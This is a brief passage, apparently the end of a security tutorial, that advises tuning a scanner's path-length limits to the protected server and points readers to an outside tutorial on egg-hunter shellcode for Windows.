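Length alone is a coarse signal (long paths are legitimate on some servers), which is why the scanner reports the reason for each finding separately; tune the ceilings to what the protected server actually accepts.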

A complete and more detailed tutorial on egg-hunter shellcode on Microsoft Windows can be found on Peter Van Eeckhoutte's blog.

Have fun with your MOSDEF :-).
